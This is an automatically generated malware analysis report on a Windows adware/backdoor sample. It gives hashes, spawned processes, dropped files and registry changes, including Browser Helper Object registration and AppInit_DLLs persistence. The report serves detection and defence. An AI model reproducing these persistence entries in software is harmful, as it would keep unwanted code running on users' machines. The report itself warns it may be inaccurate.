Skip to main content

Gen.Variant.Adware.MPlug.38_874a6a15d1


Gen:Variant.Adware.MPlug.38 (B) (Emsisoft), Gen:Variant.Adware.MPlug.38 (AdAware), Backdoor.Win32.PcClient.FD (Lavasoft MAS)Behaviour: Backdoor, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 874a6a15d18c264327f5c81ec98e2cf9

SHA1: b90f3dd3fba951e828a2a234121e3fe3916cc230

SHA256: 4e8aed5e3c3e1520d6e4a473dca4d0a5240c3a36ddbd4aa1ec2e7adfef5ea047

SSDeep: 12288:Bz5KLZTKN8Vgo 2PlRiTPYwfGnU/3dMvb:Bz4LZTKzOoTPYwfGnmMT

Size: 465920 bytes

File type: EXE

Platform: WIN32

Entropy: Not Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2012-09-04 03:38:00

Analyzed on: WindowsXP SP3 32-bit

Summary: Backdoor. Malware that enables a remote control of victim's machine.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

regsvr32.exe:1932
regsvr32.exe:1980
ArmorerRise.xyz.exe:2036
%original file name%.exe:1176
%original file name%.exe:1988
%original file name%.exe:368
%original file name%.exe:1888
%original file name%.exe:188
%original file name%.exe:1016
rundll32.exe:1432
rundll32.exe:1196

The Backdoor injects its code into the following process(es):No processes have been created.

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process regsvr32.exe:1932 makes changes in the file system.


The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}-log.txt (57034 bytes)

The process ArmorerRise.xyz.exe:2036 makes changes in the file system.


The Backdoor creates and/or writes to the following file(s):

%Program Files%\TailCutter\TailCutter.dll (80814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)

The process %original file name%.exe:1176 makes changes in the file system.


The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca.part (71639 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb (13 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\a6316e1ae4dae3cab1ad0965983a8e70.ini (517 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\loader.gif (2 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\9Bgp6JPux0JTfR[1].ca (129298 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll (6700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\progressbar.gif (15 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6 (0 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (0 bytes)

The process %original file name%.exe:1988 makes changes in the file system.


The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\2UzDN7fW9Yl4sH[1].ca (65187 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.exe (2486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca.part (38114 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\2e3398c745d7293bb1ad0965983a8e70.ini (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\progressbar.gif (15 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.dat (312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca (0 bytes)

The process %original file name%.exe:368 makes changes in the file system.


The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\bg.ca.part (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\874a6a15d18c264327f5c81ec98e2cf9.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\3.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(5).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\2.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\6.ini.tmp (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\874a6a15d18c264327f5c81ec98e2cf9.dat (866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(2).ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\ArmorerRise.xyz.exe (16584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\5.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\4.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\2.ini (0 bytes)

The process %original file name%.exe:1888 makes changes in the file system.


The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\d2bec04cb91e9cb6b1ad0965983a8e70.ini (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca.part (31648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Oo8yOHF14wFvBA[1].ca (29424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\loader.gif (2 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7 (0 bytes)

The process %original file name%.exe:188 makes changes in the file system.


The Backdoor creates and/or writes to the following file(s):

%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\progressbar.gif (15 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll (6665 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca.part (43652 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\73515851bcb7cafbb1ad0965983a8e70.ini (522 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xoL9D9NSNKXd4Z[1].ca (123415 bytes)

The Backdoor deletes the following file(s):

%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1 (0 bytes)

The process %original file name%.exe:1016 makes changes in the file system.


The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\loader.gif (2 bytes)
%Program Files%\Chime\Chime.exe (1504 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\3e3e983e008005d3b1ad0965983a8e70.ini (285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca.part (16744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[2] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\XwPLangqfnEVNV[1].ca (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\progressbar.gif (15 bytes)
%Program Files%\Chime\Chime.dat (5 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\0e466769 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (0 bytes)

Registry activity

The process regsvr32.exe:1932 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{6942a161-f713-42a7-a4aa-3bafc71fc8a6}" = "1"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\TypeLib]
"Version" = "1.0"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9]
"(Default)" = "BrrOwsiNGclEarly"

[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\0\win32]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_\CurVer]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9"

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\ProgID]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9"

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\VersionIndependentProgID]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}]
"(Default)" = "IRegistry"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = ""

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = "BrrOwsiNGclEarly"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_\CLSID]
"(Default)" = "{6942a161-f713-42a7-a4aa-3bafc71fc8a6}"

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\TypeLib]
"Version" = "1.0"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9\CLSID]
"(Default)" = "{6942a161-f713-42a7-a4aa-3bafc71fc8a6}"

[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\HELPDIR]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}]
"(Default)" = "IRuntime"

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\InprocServer32]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll"

[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_]
"(Default)" = "BrrOwsiNGclEarly"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 23 59 E0 34 27 93 FA 50 40 84 2D 22 09 F9 23"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}]
"(Default)" = "IPlaghinMein"

[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = ""

[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\Programmable]
"(Default)" = ""

[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}]
"(Default)" = "ILocalStorage"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = "BrrOwsiNGclEarly"

The process regsvr32.exe:1980 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\0\win32]
"(Default)" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = ""

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_\CLSID]
"(Default)" = "{6dd13515-e089-4fae-8645-2fa8c57153de}"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = "WWhiteCouPooni"

[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0]
"(Default)" = "IEPluginLib"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\ProgID]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_.9"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\VersionIndependentProgID]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}]
"(Default)" = "IPlaghinMein"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\TypeLib]
"Version" = "1.0"

[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_]
"(Default)" = "WWhiteCouPooni"

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_.9\CLSID]
"(Default)" = "{6dd13515-e089-4fae-8645-2fa8c57153de}"

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}]
"(Default)" = "ILocalStorage"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"

[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}]
"(Default)" = "IRegistry"

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_.9]
"(Default)" = "WWhiteCouPooni"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\Programmable]
"(Default)" = ""

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"

[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 D3 10 D1 CD AA 10 F1 E6 87 98 BE 13 27 48 F6"

[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\InprocServer32]
"(Default)" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}]
"(Default)" = "IRuntime"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = ""

[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\HELPDIR]
"(Default)" = "%Program Files%\WWhiteCouPooni"

[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"

[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_\CurVer]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_.9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{6dd13515-e089-4fae-8645-2fa8c57153de}" = "1"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = "WWhiteCouPooni"

"NoExplorer" = "1"

The process ArmorerRise.xyz.exe:2036 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TAILCU~1\TAILCU~1.DLL,_uninstall /un /uq"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"fe94ce1e" = "V/////%%"
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"Publisher" = "ArmorerRise"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"3c09c42b" = "///%"
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"NoRepair" = "1"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"
"bbf88800" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"DisplayName" = "ArmorerRise"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"NoModify" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"State" = "0"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"Cache" = "9428760297565573948"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"State" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
